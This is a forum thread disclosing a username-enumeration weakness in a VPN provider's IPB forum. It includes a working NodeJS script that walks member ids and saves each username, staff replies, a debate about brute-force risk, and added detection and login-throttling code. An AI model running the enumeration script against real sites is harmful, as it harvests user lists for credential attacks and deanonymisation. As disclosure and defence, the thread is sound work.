Guest Posted ...

Over the last several weeks I've reported some potential issues for the AirVPN team to investigate. All issues relate to their use of the current forum software, IPB V3. Today, I am disclosing the first potential issue for the community's consideration. The staff have a security policy which this issue was not considered under.

Disclosure details:
Reported: 15th Feb 2019 12:45PM
First reply by Clodo: 15th Feb 2019 13:04PM
Disclosure reply by myself: 15th Feb 2019 13:17PM (this reply contained the POC)
Second reply by Clodo: 15th Feb 2019 13:34PM
Reply asking for update: 19th Feb 2019 14:15PM
Staff reply: 19th Feb 2019 16:09PM

Disclosure information (taken directly from the ticket):

Details: Using your forum, it's possible to enumerate all users on your platform and track them based on their activity. This also allows somebody to maintain a list of every valid user account. This could be useful for brute-force attempts, such as trying each valid username with 'generic' passwords.

How: When you hover over a user on the forum, IPB makes a request to the following URL:
https://airvpn.org/index.php?s=[SESSION]&&app=members&module=ajax&secure_key=[KEY]&section=card&mid=63
Using this, we can build a PoC (below) to go through every "mid" from 0 to the latest (which is about 453,745).

POC (NodeJS):

const fs = require("fs");
const fetch = require("node-fetch");
const cheerio = require("cheerio");
const argv = require("minimist")(process.argv.slice(2));

// Pieces of the member-card URL that IPB requests when you hover over a user.
const config = {
  base: "https://airvpn.org/index.php",
  s: "?s=[SESSION KEY]",
  app: "&app=members",
  module: "&module=ajax",
  secure_key: "&secure_key=[KEY HERE]",
  section: "&section=card",
  cache_dir: "./data/",
  cache_exists_dir: "./data-user-exists/"
};

let mid = 0;

// Write one response (or parsed record) to disk as JSON.
function cacheData(dir, name, data) {
  console.log("Caching data...");
  fs.writeFile(dir + name + ".json", JSON.stringify(data), () => {});
}

async function fetchData(url) {
  console.log("Fetching data...");
  let res = await fetch(url).then(r => r.text());

  // IPB answers with the literal string "error" for a mid that does not exist.
  let exists = res != "error";
  let data = {
    "user_id": mid,
    "user_exists": exists,
    "html_file": mid + "-html.json",
    "data_file": mid + "-data.json",
    "user_data": null
  };

  if (exists) {
    let c = cheerio.load(res);
    let userData = {
      username: c(".nickname").text(),
      url: c(".ipsUserPhotoLink").attr("href")
    };
    data.user_data = JSON.stringify(userData);
    cacheData(config.cache_exists_dir, mid + "-html", res);
    cacheData(config.cache_exists_dir, mid + "-data", data);
  }
  cacheData(config.cache_dir, mid + "-html", res);
  cacheData(config.cache_dir, mid + "-data", data);
}

async function start() {
  console.log("Starting...");
  if (argv.end && mid > argv.end) {
    console.log("Ending...");
    return;
  }
  console.log("MID: ", mid);
  let url = config.base + config.s + config.app + config.module +
            config.secure_key + config.section + "&mid=" + mid;
  await fetchData(url);
  mid++;
  start();
}

function boot() {
  if (argv.start) {
    mid = argv.start;
  }
  start().catch(e => console.log(e));
}

boot();

// other URL:
// https://airvpn.org/index.php?app=core&module=search&do=user_activity&search_app=forums&mid=66&userMode=all&sid=[SID]

Staff reply:

Hello! Since we have ascertained that this is the default, expected behavior of IPB, please consider sending your vulnerability disclosure to the Invision team. This does not mean anyway that we may change this behavior, if possible, in the next infrastructure update. We also have a plan for 2FA for late 2019. Should you need additional replies from the developers, please do not hesitate to reply and the ticket will re-open automatically.
Kind regards
AirVPN Support Team

My reply:

Thanks for getting back to me. I am not so certain how username enumeration isn't a bigger issue, especially for a VPN service. I can find out how many members you have, which groups they belong to, when they were last active, and use that information to potentially target those particular accounts. This behavior is undesirable at best and my PoC demonstrated how trivially easy it is to collect that information. So far, I'm at 250,000 users and will have a complete list soon. Considering you do not have 2FA to this day (and have not for years), it is not certain if this has been abused before in being used to send automated login requests using known passwords. This can also be used to collect usernames and cross reference them in other datasets you can find across the internet for targeting. Again, if I wanted to keep my username secret this is no longer possible. Also, I noticed there is a group called "members2"; on the surface it would appear this is a collection of all premium users, but I can't verify that for sure just yet. This feature should be disabled on your forum and I should be credited for demonstrating how easy it has been to collect this information. It may not seem significant, but if it's not a big deal maybe I can publish this on your forums? I want to disclose this anyway as it is the right thing to do. Thanks.

My main concern with this is that it's possible to collect a list of usernames, order them by when they were last active, and potentially use that as an attack vector, such as brute force attempts. Although, to AirVPN's credit, brute forcing is limited. I tried and after a few incorrect attempts the IP was blacklisted. Although this could be used to DoS the IP (such as AirVPN's own IPs) to prevent users logging in, it's a good security measure to prevent such attacks.
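The post above describes the request IPB issues for a member card (app=members, module=ajax, section=card, mid=N) and the fact that a sweep simply walks mid upwards. From the operator's side, that pattern is easy to pick out of an access log: a hovering reader requests a handful of scattered ids, a sweep requests long runs of consecutive ones. The following is an added example written for this thread and is not code from the post, from AirVPN or from Invision; the log lines are constructed samples in Apache combined-log layout, and the thresholds (five distinct ids, 80% consecutive) are assumed values an operator would tune before rate-limiting or blocking the endpoint for flagged clients.

```javascript
// Added example (not from the thread, AirVPN or Invision): detect a client
// sweeping the IPB member-card endpoint (app=members&module=ajax&section=card)
// by walking the "mid" parameter sequentially. Log lines below are constructed
// samples in Apache combined-log layout; thresholds are assumed values.

const SAMPLE_LOG = [
  // scraper: eight member cards in strict mid order from one address
  ...Array.from({ length: 8 }, (_, i) =>
    `203.0.113.7 - - [15/Feb/2019:12:40:0${i} +0000] "GET /index.php?s=abc&&app=members&module=ajax&secure_key=k&section=card&mid=${100 + i} HTTP/1.1" 200 812`),
  // ordinary reader: a few scattered cards from hovering over posts
  ...[63, 1245, 9001, 88, 412].map((mid, i) =>
    `198.51.100.4 - - [15/Feb/2019:12:41:1${i} +0000] "GET /index.php?s=def&&app=members&module=ajax&secure_key=k&section=card&mid=${mid} HTTP/1.1" 200 790`),
  // unrelated traffic and a single card lookup, neither of which should be reported
  '192.0.2.9 - - [15/Feb/2019:12:42:00 +0000] "GET /index.php?app=forums&module=forums&section=findpost&pid=5 HTTP/1.1" 200 4120',
  '192.0.2.9 - - [15/Feb/2019:12:42:05 +0000] "GET /index.php?s=ghi&&app=members&module=ajax&secure_key=k&section=card&mid=63 HTTP/1.1" 200 812',
];

const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) HTTP\/[\d.]+" (\d{3})/;

// Parse one access-log line into { ip, path, status, mid }. mid is set only
// for member-card requests; returns null for lines that do not match.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, ip, , path, status] = m;
  // Base URL is only there to satisfy the parser; the query string is what matters.
  const params = new URL(path, 'http://localhost').searchParams;
  const isCard = params.get('app') === 'members'
    && params.get('module') === 'ajax'
    && params.get('section') === 'card';
  const mid = isCard ? Number.parseInt(params.get('mid'), 10) : null;
  return { ip, path, status: Number(status), mid: Number.isInteger(mid) ? mid : null };
}

// Group member-card requests by client and score how sequential the ids are.
// A reader hovering over posts produces scattered ids; a sweep produces runs
// of consecutive ids. minRequests/minSequentialRatio are assumed thresholds.
function analyse(lines, { minRequests = 5, minSequentialRatio = 0.8 } = {}) {
  const midsByIp = new Map();
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec || rec.mid === null) continue;
    if (!midsByIp.has(rec.ip)) midsByIp.set(rec.ip, []);
    midsByIp.get(rec.ip).push(rec.mid);
  }
  const findings = [];
  for (const [ip, mids] of midsByIp) {
    const sorted = [...new Set(mids)].sort((a, b) => a - b);
    if (sorted.length < minRequests) continue;
    let consecutive = 0;
    for (let i = 1; i < sorted.length; i++) {
      if (sorted[i] - sorted[i - 1] === 1) consecutive++;
    }
    const sequentialRatio = consecutive / (sorted.length - 1);
    findings.push({
      ip,
      cardRequests: mids.length,
      distinctMids: sorted.length,
      sequentialRatio,
      suspicious: sequentialRatio >= minSequentialRatio,
    });
  }
  return findings;
}

console.log(JSON.stringify(analyse(SAMPLE_LOG), null, 2));
```

Run with `node` on a real log by replacing SAMPLE_LOG with the file's lines; the script only needs the query string, so it works the same whether the session and secure_key values are present or stripped by the log format.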
zhang888 1066 Posted ...

Note that brute force is not considered a vulnerability nor an attack vector on any platform or bug bounty program. Brute forcing is limited as a countermeasure against annoying bots, not as an "anti hacking" mechanism. A decent amount of those signups are actually bots with weak passwords, so at least you need to filter the premium users in order to gain something from this attack. But, even compromising a premium user will only allow you:
1) Downloading the user's config in order to use the 5 connection slots
2) Post on the forums on their behalf
3) View their support tickets, if any

Since it's a public VPN, and a premium subscription is available to anyone, your maximum gain from the attack will be a hacked premium account. Which is quite an effort for a few Euros.

Occasional moderator, sometimes BOFH. Opinions are my own, except when my wife disagrees.
Guest Posted ...

> Note that brute force is not considered a vulnerability nor an attack vector on any platform or bug bounty program. Brute forcing is limited as a countermeasure against annoying bots, not as an "anti hacking" mechanism. A decent amount of those signups are actually bots with weak passwords, so at least you need to filter the premium users in order to gain something from this attack. But, even compromising a premium user will only allow you:
> 1) Downloading the user's config in order to use the 5 connection slots
> 2) Post on the forums on their behalf
> 3) View their support tickets, if any
> Since it's a public VPN, and a premium subscription is available to anyone, your maximum gain from the attack will be a hacked premium account. Which is quite an effort for a few Euros.

Magic work is privacy and has nothing to do with the few $ account that you will get. If I get access to an account I can go enable sessions archive and then I assume you will not be so happy. A VPN has a privacy focus, so being able to get all accounts is a major flaw of the platform. It's a flawed system. You can't have the same accounts on a forum and the service, especially when it's paid and for privacy-conscious people. They should give the ability to all users to separate themselves from a forum account. Second, having no two-step authentication (coming end of 2019 they said) makes the problem even worse.
zhang888 1066 Posted ...

The session archive is only useful when you know which user to target specifically. Which by then turns it into a classic brute force attack, even when you know which username to brute force. I do agree that the problem is more severe in case users choose to use their personal email as the forum display name, since then it does reveal a personal detail to the public and to the search engines.

> A VPN has a privacy focus, so being able to get all accounts is a major flaw of the platform.

Consider it like this - when you have a public forum, no matter which (IPB, vBulletin, phpBB, SMF), you will be able to see all the member list (logins). This is just how forums work.
Flx 76 Posted ...

> They should give the ability to all users to separate themselves from a forum account.

From a website design perspective, "Sign in" and "Sign into Forums" would be a better way of addressing this, which then would have totally different functions, purpose and level of access, and not relate to each other. Suggestion: Move the Forums button next to Sign in and make it a separate login.
Guest Posted ...

> The session archive is only useful when you know which user to target specifically. Which by then turns it into a classic brute force attack, even when you know which username to brute force. I do agree that the problem is more severe in case users choose to use their personal email as the forum display name, since then it does reveal a personal detail to the public and to the search engines.
> Consider it like this - when you have a public forum, no matter which (IPB, vBulletin, phpBB, SMF), you will be able to see all the member list (logins). This is just how forums work.

Tell me a paid service based on a forum account. I am not debating how forums work, so stop acting like this is what I am implying. Guessing the account owner in some cases is not as hard as you may think with enough info on the user. There are multiple ways to reduce a pool of users.
Guest Posted ...

I've also found another, far more effective way of potentially brute forcing accounts which has been reported to the staff. AirVPN is the only provider I know that makes this enumeration technique possible. Normally, getting access to an account shouldn't matter, but AirVPN's forum logs more than most providers, such as a session archive, connected sessions, when each key/device was last active, any payment information saved on the account, invoices and everything that can be found inside the client area. This behavior is undesirable at best, and the brute forcing should at least be limited (maybe 3 incorrect login attempts) like most other sites on the internet. But mainly, AirVPN doesn't tell you about your account security: there's no 'recent logins', or any way to know if somebody has access to your account. I guess each individual is responsible for their own security, but some monitoring is also appreciated.
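Two points in the thread pull in opposite directions: the OP wants failed logins capped after about three attempts, but also noted earlier that blacklisting the source IP after a few failures lets anyone lock out everybody behind that IP (AirVPN's own exit addresses included). The usual way to get both is to count failures per (account, client IP) pair, with a looser per-account ceiling to catch attempts that rotate addresses, and to answer with a growing delay rather than a hard ban. The class below is an added example written for this thread, not AirVPN's or Invision's code; every threshold in it is an assumed value, and the scenario in demo() is constructed.

```javascript
// Added example (not AirVPN's or IPB's code): a login throttle keyed on the
// (account, client IP) pair, with a looser per-account ceiling, that returns a
// growing retry delay instead of blacklisting the IP. A burst of bad passwords
// against one account slows that pair down without locking every user behind a
// shared address (a VPN exit, say) out of the login page. Thresholds are assumed.

class LoginThrottle {
  constructor({
    maxFailures = 3,             // failures per (account, ip) before delays start
    accountMaxFailures = 20,     // failures per account across all ips
    windowMs = 15 * 60 * 1000,   // failures older than this are forgotten
    baseDelayMs = 2000,          // first delay; doubles with each further failure
    maxDelayMs = 10 * 60 * 1000, // cap, so the real owner is slowed, not locked out
  } = {}) {
    Object.assign(this, { maxFailures, accountMaxFailures, windowMs, baseDelayMs, maxDelayMs });
    this.failures = new Map(); // key -> timestamps of failures inside the window
  }

  static pairKey(user, ip) { return `pair:${user.toLowerCase()}|${ip}`; }
  static acctKey(user) { return `acct:${user.toLowerCase()}`; }

  // Drop expired failures for a key and return (the stored array of) live ones.
  recent(key, now) {
    const cutoff = now - this.windowMs;
    const live = (this.failures.get(key) || []).filter(t => t > cutoff);
    this.failures.set(key, live);
    return live;
  }

  // Milliseconds until the next attempt is acceptable for this key (<= 0: now).
  waitFor(list, threshold, now) {
    if (list.length < threshold) return 0;
    const delay = Math.min(this.baseDelayMs * 2 ** (list.length - threshold), this.maxDelayMs);
    return list[list.length - 1] + delay - now;
  }

  // Call before checking the password. Returns { allowed, retryAfterMs }.
  check(user, ip, now = Date.now()) {
    const retryAfterMs = Math.max(0,
      this.waitFor(this.recent(LoginThrottle.pairKey(user, ip), now), this.maxFailures, now),
      this.waitFor(this.recent(LoginThrottle.acctKey(user), now), this.accountMaxFailures, now));
    return { allowed: retryAfterMs === 0, retryAfterMs };
  }

  // Call after a wrong password.
  recordFailure(user, ip, now = Date.now()) {
    this.recent(LoginThrottle.pairKey(user, ip), now).push(now);
    this.recent(LoginThrottle.acctKey(user), now).push(now);
  }

  // Call after a correct password: the account holder has proven themselves.
  recordSuccess(user, ip) {
    this.failures.delete(LoginThrottle.pairKey(user, ip));
    this.failures.delete(LoginThrottle.acctKey(user));
  }
}

// Constructed scenario: three bad passwords for "alice" from one address,
// then checks for the same pair, another user on that address, and alice elsewhere.
function demo() {
  const t0 = 1550000000000; // fixed epoch ms so the run is reproducible
  const th = new LoginThrottle({ maxFailures: 3, baseDelayMs: 2000, maxDelayMs: 60000 });
  [0, 100, 200].forEach(dt => th.recordFailure('alice', '203.0.113.7', t0 + dt));
  return {
    aliceSameIp: th.check('alice', '203.0.113.7', t0 + 300),    // throttled, 1900 ms left
    bobSameIp: th.check('bob', '203.0.113.7', t0 + 300),        // same IP, unaffected
    aliceOtherIp: th.check('alice', '198.51.100.4', t0 + 300),  // other IP, unaffected
    aliceLater: th.check('alice', '203.0.113.7', t0 + 2300),    // delay has elapsed
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The per-account counter is what stops an attacker simply rotating addresses, and because it only ever adds a bounded delay, the worst a stranger can do to the real owner is make them wait out maxDelayMs, not lock them out; a "recent logins" view, as the post asks for, would be the natural place to surface these throttled attempts to the account holder.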
Staff 9972 Posted ...

Before this thread becomes even more grotesque than it is now, we would like just to remind you that no vulnerability has been found so far on this subject, so we invite the OP to publicly declare that he/she found no vulnerability and no exploit, or report them to us.

Kind regards
Guest Posted ...

> Before this thread becomes even more grotesque than it is now, we would like just to remind you that no vulnerability has been found so far on this subject, so we invite the OP to publicly declare that he/she found no vulnerability and no exploit, or report them to us. Kind regards

This is correct - the only issue is information disclosure at play here, allowing an attacker to compile a list of usernames for targeting. It's honestly not the biggest issue in the world, but a VPN ideally shouldn't be disclosing their entire list of users.
83jd0whx38ns 0 Posted ...

As an AirVPN user, I'd say that this should be addressed ASAP.
Staff 9972 Posted ...

> This is correct - the only issue is information disclosure at play here, allowing an attacker to compile a list of usernames for targeting. It's honestly not the biggest issue in the world, but a VPN ideally shouldn't be disclosing their entire list of users.

Hello! Good to hear that no vulnerability has surfaced and no exploit is available.

Kind regards